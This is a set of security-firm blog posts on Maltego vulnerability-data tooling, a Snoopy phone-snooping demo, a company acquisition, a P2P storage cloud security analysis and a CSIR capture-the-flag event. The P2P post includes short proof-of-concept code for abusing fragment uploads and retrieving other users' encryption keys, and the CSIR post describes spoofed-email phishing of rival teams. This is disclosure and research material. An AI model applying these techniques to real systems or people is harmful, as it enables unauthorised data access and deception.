
Fri, 13 Jun 2014

Using Maltego to explore threat & vulnerability data

This blog post is about the process we went through trying to better interpret the masses of scan results that automated vulnerability scanners and centralised logging systems produce. A good example of the value in getting actionable items out of this data is the recent Target compromise. Their scanning solutions detected the threat that led to their compromise, but no humans intervened. It's suspected that so many security alerts were being generated on a regular basis that nobody could act on them all.


The goal of our experiment was to steer away from the usual data interrogation questions of "What are the top N vulnerabilities my scanner has flagged with a high threat?" towards questions like "For how many of my vulnerabilities do public exploits exist?". Near the end of this exercise we stumbled across the BSides talk "Stop Fixing All The Things". These researchers took a similar viewpoint: "As security practitioners, we care about which vulnerabilities matter". Their blog post and video are definitely worth having a look at.


At SensePost we have a Managed Vulnerability Scanning service (MVS). It incorporates numerous scanning agents (e.g. Nessus, Nmap, Netsparker and a few others) and exposes an API to interact with the results. This was our starting point for exploring threat-related data, which we could then couple with remote data sources (e.g. CVE data, exploit-db.com data).


We chose to use Maltego to explore the data as it's an incredibly powerful data exploration and visualisation tool, and writing transforms is straightforward. If you'd like to know more about Maltego, here are some useful references:


We ended up building:

  • Transforms to explore our MVS data

  • A CVE / exploit-db.com API engine

  • Transforms to correlate between scanner data and the created APIs

  • Maltego Machines to combine our transforms


So far our API is able to query a database populated from CVE XML files and data from www.exploit-db.com (they were kind enough to give us access to their CVE-inclusive data set). It's a standalone Python program that pulls down the XML files, populates a local database, and then exposes a REST API. We're working on incorporating other sources, such as threat feeds and other logging/scanning systems - let us know if you have any ideas. Here's the API in action:


Parsing CVE XML data and exposing REST API


Querying a CVE. We see 4 public exploits are available.
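To make that concrete, here is a minimal, hypothetical sketch of the parse-store-serve pattern described above. The XML layout, table schema, file name and routes are illustrative assumptions, not our production code (real CVE feeds use namespaced, richer XML):

# Hypothetical sketch only: field names, schema and routes are assumptions.
import sqlite3
import xml.etree.ElementTree as ET
from flask import Flask, jsonify

app = Flask(__name__)
DB = "cve.db"

def load_cves(xml_path):
    """Parse a CVE XML dump and populate a local SQLite table."""
    conn = sqlite3.connect(DB)
    conn.execute("CREATE TABLE IF NOT EXISTS cve (id TEXT PRIMARY KEY, summary TEXT)")
    for entry in ET.parse(xml_path).getroot():
        cve_id = entry.get("id")                        # e.g. CVE-2014-0160
        summary = entry.findtext("summary", default="")
        conn.execute("INSERT OR REPLACE INTO cve VALUES (?, ?)", (cve_id, summary))
    conn.commit()
    conn.close()

@app.route("/cve/<cve_id>")
def get_cve(cve_id):
    """Serve a single CVE record as JSON over a REST-style route."""
    conn = sqlite3.connect(DB)
    row = conn.execute("SELECT id, summary FROM cve WHERE id = ?", (cve_id,)).fetchone()
    conn.close()
    if row is None:
        return jsonify(error="not found"), 404
    return jsonify(id=row[0], summary=row[1])

if __name__ == "__main__":
    load_cves("nvdcve-recent.xml")  # file name is an assumption
    app.run(port=8080)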


It's also worth noting that for the demonstrations that follow we've obscured our clients' names by applying a salted 'human readable hash' to their names. A side effect is that you'll notice some rather humorous entries in the images and videos that follow.
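For the curious, the idea behind such an obfuscation can be sketched in a few lines of Python. The word lists and salt below are made up, not the ones we used:

# Salted 'human readable hash': deterministically map a client name to a
# two-word alias. Word lists and salt are illustrative only.
import hashlib

ADJECTIVES = ["bravo", "crimson", "silent", "rapid"]
NOUNS = ["tango", "falcon", "harbour", "anvil"]
SALT = b"not-the-real-salt"

def readable_hash(client_name):
    digest = hashlib.sha256(SALT + client_name.encode()).digest()
    # Index the word lists with the first two digest bytes.
    return ("%s %s" % (ADJECTIVES[digest[0] % len(ADJECTIVES)],
                       NOUNS[digest[1] % len(NOUNS)])).title()

print(readable_hash("Acme Corp"))  # e.g. 'Bravo Tango'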


Jumping into the interesting results, these are some of the tasks we can perform (a sketch of one such transform follows the list):


  • Show me all hosts that have a critical vulnerability within the last 30 days

  • Show me vulnerable hosts for which public exploit code exists

  • Show me all hosts for which a vulnerability exists that has the word 'jmx-console' in the description

  • Show me all hosts in my DMZ that have port 443 open

  • Given a discovered vulnerability on a host, show me all other hosts with the same vulnerability

  • Show me a single diagram depicting every MVS client, weighted by the threat of all scans within the last week

  • Show me a single diagram depicting every MVS client, weighted by the availability of public exploit code

  • Given a CPE, show me all hosts that match it
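
As an illustration of how one of these queries might map onto a Maltego local transform, here is a hedged sketch. The MVS endpoint, parameters and JSON fields are placeholders rather than the real API:

#!/usr/bin/env python
# Local transform sketch: client name in, critically vulnerable hosts out.
# Endpoint URL, parameters and JSON fields are placeholders.
import sys
import requests

client = sys.argv[1]  # entity value handed over by Maltego
resp = requests.get("https://mvs.example/api/hosts",
                    params={"client": client, "severity": "critical", "days": 30})

# Maltego local transforms return entities as XML on stdout.
print("<MaltegoMessage><MaltegoTransformResponseMessage><Entities>")
for host in resp.json().get("hosts", []):
    print('  <Entity Type="maltego.IPv4Address"><Value>%s</Value></Entity>' % host["ip"])
print("</Entities></MaltegoTransformResponseMessage></MaltegoMessage>")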


Clicking the links in the above scenarios will display a screenshot of a solution. Additionally, two video demonstrations with dialogue are below.


Retrieving all recent vulnerabilities for a client 'Bravo Tango', and checking one of them to see if there's public exploit code available.


Exploring which clients/hosts have which ports open


In summary, building 'clever tools' that combine automation with human insight can be powerful. An experienced analyst who asks the right questions, equipped with tools that make the answers easy to extract, produces actionable tasks in less time. We're going to start using this approach internally to find new ways to explore the vulnerability data sets of our scanning clients, and see how it goes.


Looking ahead, we're working on incorporating further data sources (e.g. LogRhythm, Skybox). We're also upgrading our MVS API; you'll notice a lot of the Maltego queries are cumbersome and slow due to the current linear exploration approach.


The source code for the CVE/exploit-db API engine and the proof-of-concept Maltego transforms can be downloaded from our GitHub page, and the MVS (BroadView) API from here. You'll need a paid subscription to incorporate the exploit-db.com data, but it's an initiative well worth supporting, with a very fair pricing model; they put significant effort into correlating CVEs. See this page for more information.


Do get in touch with us (or comment below) if you'd like to know more about the technical details, chat about the API (or expand on it), if this is a solution you'd like to deploy, or if you'd just like to say "Hi".

Thu, 12 Dec 2013

Never mind the spies: the security gaps inside your phone

For the last year, Glenn and I have been obsessed with our phones, especially with regard to the data being leaked by a device that is always with you, powered on and often provided with a fast Internet connection. From this obsession, the Snoopy framework was born and released.


After 44con this year, Channel 4 contacted us to be part of a new experimental show named 'Data Baby', whose main goal is to grab ideas from the security community and transform them into easy-to-understand concepts screened to the public during the 7 o'clock news.


Their request was simple: Show us the real threat!


To fulfil their request, we set up Snoopy to intercept, profile and access data from a group of "victim" students at a location in Central London. While this is something we've done extensively over the past twelve months, we've never had to do it with a television crew and cameras watching our every move!


The venue, the Evans and Peel Detective Agency, added to the sinister vibe, with their offices literally located underground. We were set up in a secret room behind a bookcase like friggin' spies and got the drones ready for action. As the students arrived, we had a single hour to harvest as much information as we could. Using Snoopy, Maltego and a whole lot of frantic clicking and typing (hacking under stress is not easy), we were filmed gaining access to their inboxes and other personal information.


In the end, Snoopy and Maltego delivered the goods and Glenn added a little charm for the ladies.



After the segment was aired, we participated in a live Twitter Q&A session with viewers (so, so many viewers, we had to tag in others to help reply to all the tweets) and gave advice on how they could prevent themselves from being the next victim. Our advice to them, and indeed anyone else concerned is:


How to avoid falling foul of mobile phone snooping
- Be discerning about when you switch Wi-Fi on
- Check which Wi-Fi network you're connecting to; if you're connecting to Starbucks when you're nowhere near a branch, something's wrong
- Download the latest updates for your phone's operating system, and keep the apps updated too
- Check your application providers' (like e-mail) security settings to make sure all your email traffic is "encrypted", not just the login process
- Tell your phone to forget networks once you're done with them, and be careful about joining "open" aka "unencrypted" networks

Fri, 1 Nov 2013

A new owner for a new chapter

We're pleased to announce our acquisition today by SecureData Europe.


SecureData (www.secdata.com) is a complete, independent security services provider based in the UK, and was also previously part of the SecureData Holdings group before being acquired by management in November 2012. The strategic acquisition complements SecureData's vision of enabling an end-to-end, proactive approach to security for global customers: assessing risk, detecting threats in real time, protecting valuable assets and responding to security issues when they occur.


This deal signals the culmination of a long period of negotiation between SecureData Holdings, SecureData Europe and SensePost management and represents a cordial and amicable arrangement that is considered to be to the benefit of all three businesses. As the management of SensePost we are fully committed to this change, which we believe is in the best interests of SensePost, our staff and our customers. We believe this move will herald for us a new era of growth and development that will see us better equipped and prepared to meet the requirements of the market and fulfil our mission of providing insight, information and systems that enable our customers to make informed decisions about information security.


We look forward to an exciting period of innovation, growth and development that we believe this transaction will ultimately enable!

Fri, 12 Apr 2013

Analysis of Security in a P2P storage cloud

A cloud storage service such as Microsoft SkyDrive requires building data centres, with the associated operational and maintenance costs. An alternative approach is a distributed computing model that utilises a portion of the storage and processing resources of consumer-level computers and SME NAS devices to form a peer-to-peer storage system. Members contribute some of their local storage space to the system and in return receive an "online backup and data sharing" service. Providing data confidentiality, integrity and availability in such a decentralised storage system is a big challenge. As the cost of data storage devices declines, there is debate over whether P2P storage can really save costs. I leave this debate to the critics; instead, I will look into a peer-to-peer storage system and study its security measures and possible issues. An overview of this system's architecture is shown in the following picture:


Each node in the storage cloud receives an amount of free online storage space, which can be increased by the control server if the node agrees to "contribute" some of its local hard drive space to the system. File synchronisation and contribution agents running on every node interact with the cloud control server and other nodes, as shown in the above picture. Folder/file synchronisation is performed in the following steps (a code sketch follows step 4):



1) The node authenticates itself to the control server and sends a file upload request with file metadata, including the SHA1 hash, size, number of fragments and file name, over an HTTPS connection.


2) The control server replies with the AES encryption key for the relevant file/folder, an [IP address]:[port number] list of contributing nodes called the "endpoints list", and a file ID.


3) The file is split into blocks, each of which is encrypted with the above AES encryption key. The blocks are further split into 64 fragments, and redundancy information is added to them.


4) The node then connects to the contribution agent on each endpoint address received in step 2 and uploads one fragment to each of them.
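
Putting the four steps together, a client-side sketch might look as follows. The block size, cipher mode and wire format are assumptions (the target system is deliberately unnamed), and the redundancy encoding is omitted:

# Client-side sketch of steps 1-4. Block size, cipher mode and the wire
# format are assumptions; redundancy encoding is omitted for brevity.
import hashlib
import requests
from Crypto.Cipher import AES  # pycryptodome

BLOCK_SIZE = 1024 * 1024   # 1 MiB blocks (assumed)
FRAGMENTS_PER_BLOCK = 64

def sync_file(path, control="https://control.example"):
    data = open(path, "rb").read()
    # Step 1: authenticate (omitted) and announce the file's metadata.
    meta = {"sha1": hashlib.sha1(data).hexdigest(), "size": len(data),
            "name": path, "fragments": FRAGMENTS_PER_BLOCK}
    reply = requests.post(control + "/upload-request", json=meta).json()
    # Step 2: the control server returns the AES key, endpoints and file ID.
    key = bytes.fromhex(reply["aes_key"])
    endpoints = reply["endpoints"]     # list of [ip, port] pairs
    for i in range(0, len(data), BLOCK_SIZE):
        # Step 3: encrypt each block, then cut it into 64 fragments.
        cipher = AES.new(key, AES.MODE_CTR)        # mode is an assumption
        block = cipher.nonce + cipher.encrypt(data[i:i + BLOCK_SIZE])
        frag_size = -(-len(block) // FRAGMENTS_PER_BLOCK)  # ceiling division
        fragments = [block[j:j + frag_size] for j in range(0, len(block), frag_size)]
        # Step 4: upload one fragment to each contributing endpoint.
        for fragment, (ip, port) in zip(fragments, endpoints):
            requests.put("http://%s:%s/fragment" % (ip, port), data=fragment)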


Since the system nodes are not under the full control of the control server, they may fall offline at any time, or the stored file fragments may become damaged or intentionally modified. As such, the control server needs to monitor node and fragment health regularly so that it can move lost/damaged fragments to alternate nodes if need be. For this purpose, the contribution agent on each node maintains an HTTPS connection to the control server, on which it receives the following "tasks" (the block check flow is sketched after the list):


a) Adjust settings: instructs the node to modify its upload/download limits, contribution size, etc.


b) Block check: asks the node to connect to another contribution node and verify a fragment's existence and hash value.


c) Block recovery: asks the node to assist the control server in recovering a number of fragments.
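
In spirit, a contribution agent servicing a block check task might do something like the following. The URLs and field names are illustrative, not the analysed product's:

# Sketch of servicing a 'block check' task: fetch the fragment from the
# named endpoint, re-hash it and report back. All names are illustrative.
import hashlib
import requests

def block_check(task, control="https://control.example"):
    ip, port, fragment = task["ip"], task["port"], task["fragment"]
    body = requests.get("http://%s:%s/%s" % (ip, port, fragment)).content
    requests.post(control + "/task-result", json={
        "fragment": fragment,
        "sha1": hashlib.sha1(body).hexdigest(),  # control server compares
    })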


By delegating the above tasks, the control system has placed some degree of "trust", or at least made "assumptions", about the availability and integrity of the agent software running on the storage cloud nodes. However, those agents can be manipulated by malicious nodes in order to disrupt cloud operations, attack other nodes or even gain unauthorised access to the distributed data. I limited the scope of my research to the synchronisation and contribution agent software of two storage nodes under my control, one of which was acting as a contribution node. I didn't include analysis of the encryption or redundancy of the system in my preliminary research, because it could affect the live system and should only be performed in a test environment, which was not possible to set up as the target system's control server was not publicly available. Within the contribution agent alone, I found that I had not only unauthorised file storage (and download) on the cloud's nodes, but also unauthorised access to the folder encryption keys.


a) Unauthorised file storage and download


The contribution agent created a TCP network listener that processed commands from the control server as well as requests from other nodes. The agent communicated over HTTP(S) with the control server and other nodes in the cloud. An example file fragment upload request from a remote node is shown below:



Uploading fragments with a path name similar to the above format resulted in a "bad request" error from the agent. This indicated that the fragment name should be related to its content, a condition the contribution agent checks before accepting the PUT request. By decompiling the agent software, it was found that the fragment name must have the following format to pass this validation:


<SHA1(uploaded content)>.<Fragment number>.<Global Folder Id>
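
A hedged reconstruction of such an upload, with the node address, port and folder ID made up, might look like this:

# The naming check only ties the fragment name to its own content, so any
# attacker-chosen payload passes. Node address and folder ID are made up.
import hashlib
import requests

content = open("notepad.exe", "rb").read()
name = "%s.1.123456789" % hashlib.sha1(content).hexdigest()
requests.put("http://node.example:8080/%s" % name, data=content)
# ...and the fragment can be fetched back by anyone for ~24 hours:
print(requests.get("http://node.example:8080/%s" % name).status_code)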


I used this fragment name format to successfully upload notepad.exe to the remote node, as you can see in the following figure:



The download request (GET request) was also successful regardless of the validity of the "Global Folder Id" and "Fragment Number". The uploaded file was accessible for about 24 hours, until it was purged automatically by the contribution agent, probably because it wouldn't receive any "Block Check" requests from the control server for this fragment. Twenty-four hours is still enough time for malicious users to abuse storage cloud nodes' bandwidth and storage to serve their content over the internet without the victims' knowledge.


b) Unauthorised access to folder encryption keys


The network listener responded to GET requests from any remote node, as mentioned above. This was intended to serve "Block Check" commands from the control server, which instruct a node to fetch a number of fragments from other nodes (referred to as "endpoints") and verify their integrity by re-calculating the SHA1 hash and reporting back to the control server. This could be part of the cloud's "health check" process to ensure that the distributed file fragments are accessible and not tampered with. The agent could also process "File Recovery" tasks from the control server, but I didn't observe any such command during dynamic analysis of the contribution agent, so I searched the decompiled code for clues on the file recovery process and found the following code snippet, which suggests that the agent is capable of retrieving encryption keys from the control server. This was odd, considering that each node should only have access to the encryption keys of its own folders, while it stores encrypted file fragments of other nodes.


One possible explanation for the above file recovery code could be that the node first downloads its own file fragments from remote endpoints (using an endpoint list received from the control server) and then retrieves the required folder encryption key from the control server in order to decrypt and re-assemble its own files. To test whether it was possible to abuse the file recovery operation to gain access to the encryption keys of folders belonging to other nodes, I extracted the folderInfo request format from the agent code and set up another storage node as a target. The test was successful, as shown in the following figure, and it was possible to retrieve the AES-256 encryption key for the folder ID "1099869693336". This could enable an attacker who has set up a contributing storage node to decrypt fragments that belong to other cloud users.
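
In spirit, the abusive request was as simple as the following sketch. The path and parameter names are reconstructed assumptions rather than the literal wire format:

# Ask the control server for another node's folder key. The path and field
# names are assumptions based on the decompiled folderInfo request.
import requests

resp = requests.post("https://control.example/folderInfo",
                     data={"folderId": "1099869693336"})
print(resp.json()["aes_key"])  # AES-256 key for a folder we don't own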



Conclusion:


While peer-to-peer storage systems have lower setup/maintenance costs, they face security threats from storage nodes that are not under the direct physical/remote control of the cloud controller system. Examples of such threats relate to the cloud's client agent software and the cloud server's authorisation controls, as demonstrated in this post. While analysis of the data encryption and redundancy in the peer-to-peer storage system would be an interesting future research topic, we hope that the findings from this research can be used to improve the security of various distributed storage systems.

Tue, 11 Dec 2012

CSIR Cyber Games

The Council for Scientific and Industrial Research (CSIR) recently hosted the national Cyber Games challenge as part of Cyber Security Awareness month. The challenge pitted teams of 4-5 members from different institutes against each other in a Capture the Flag-style contest. In total there were seven teams: two from Rhodes University, two from the University of Pretoria and three from the CSIR.


The games were designed around an attack/defence scenario, where teams would be given identical infrastructure which they could then patch against vulnerabilities, while identifying possible attack vectors to use against rival teams. After the initial reconnaissance phase, teams were expected to conduct a basic forensic investigation to find 'flags' hidden throughout their systems. These flags were hidden in images, pcap files, alternate data streams and in plain sight.


It was planned that teams would then be given access to a few web servers to attack and deface, gain root on, patch and do other fun things to. Once this phase was complete, the system would be opened up and the 'free-for-all' phase would see teams attacking each other's systems, losing points for each service that was rendered inaccessible. Unfortunately, due to technical difficulties, the competition did not go as smoothly as initially planned. Once the games started, the main website was rendered unusable almost immediately by teams using DirBuster to enumerate the competition scoring system. The offending teams were asked to cease their actions and the games proceeded from there; two teams were disqualified after not ceasing their attacks on official infrastructure. When teams tried to access their virtual infrastructure, new problems arose, with only the two teams from Rhodes being able to access the ESX server while the rest of the teams, based at the CSIR, had no connectivity. This was rectified, at a cost, resulting in all teams except the two Rhodes teams having access to their infrastructure. After a few hours of struggle it was decided to scrap the attack/defence part of the challenge. Teams were awarded points for finding hidden flags, with the most basic flags involving 'decoding' a morse-code pattern or a phrase 'encrypted' using a quadratic equation. It was unfortunate that the virtual infrastructure did not work as planned, as this was to be the main focus of the games; without it, many teams were left with very little to do in the time between new flag challenges being released.


In the days prior to the challenge, our team, team Blitzkrieg, decided to conduct a social engineering exercise. We expected this to add to the spirit of the games and to introduce a little friendly rivalry between the teams before the games commenced. A quick Google search for "CSIR Cyber Games" revealed a misconfigured cyber games server that had been left exposed on a public interface. Scraping this page for information allowed us to create a fake Cyber Games site. A fake Twitter account was created on behalf of the CSIR Cyber Games organisers and used to tweet little titbits of disinformation. Once we had set up our fake site and Twitter account, a spoofed email in the name of the games organiser was sent out to all the team captains, inviting them to follow our fake user on Twitter and to register on our cyber games page. Unfortunately, this exercise did not go down too well with the games organisers, and our team was threatened with disqualification or starting the games on negative points. In hindsight, we should have run this by the organisers first to ensure that it was within scope. After the incident we engaged with the organisers to explain our position and intentions; they were very understanding and decided not to disqualify us or apply any points-based penalty. As part of our apology, we agreed to submit a few challenges for next year's Cyber Games.


Overall, we believe the concept of using structured cyber games to promote security awareness is both fun and useful. While the games were hampered by network issues, there was enough content available to make for an entertaining and exciting afternoon. The rush of solving challenges as fast as possible, with everyone communicating ideas, made for an epic day. In closing, the CSIR Cyber Games was a success; as with all things, we believe it will improve over time and provide a good platform to promote security awareness.


For the defacement phase of the games, we made an old-school defacement page.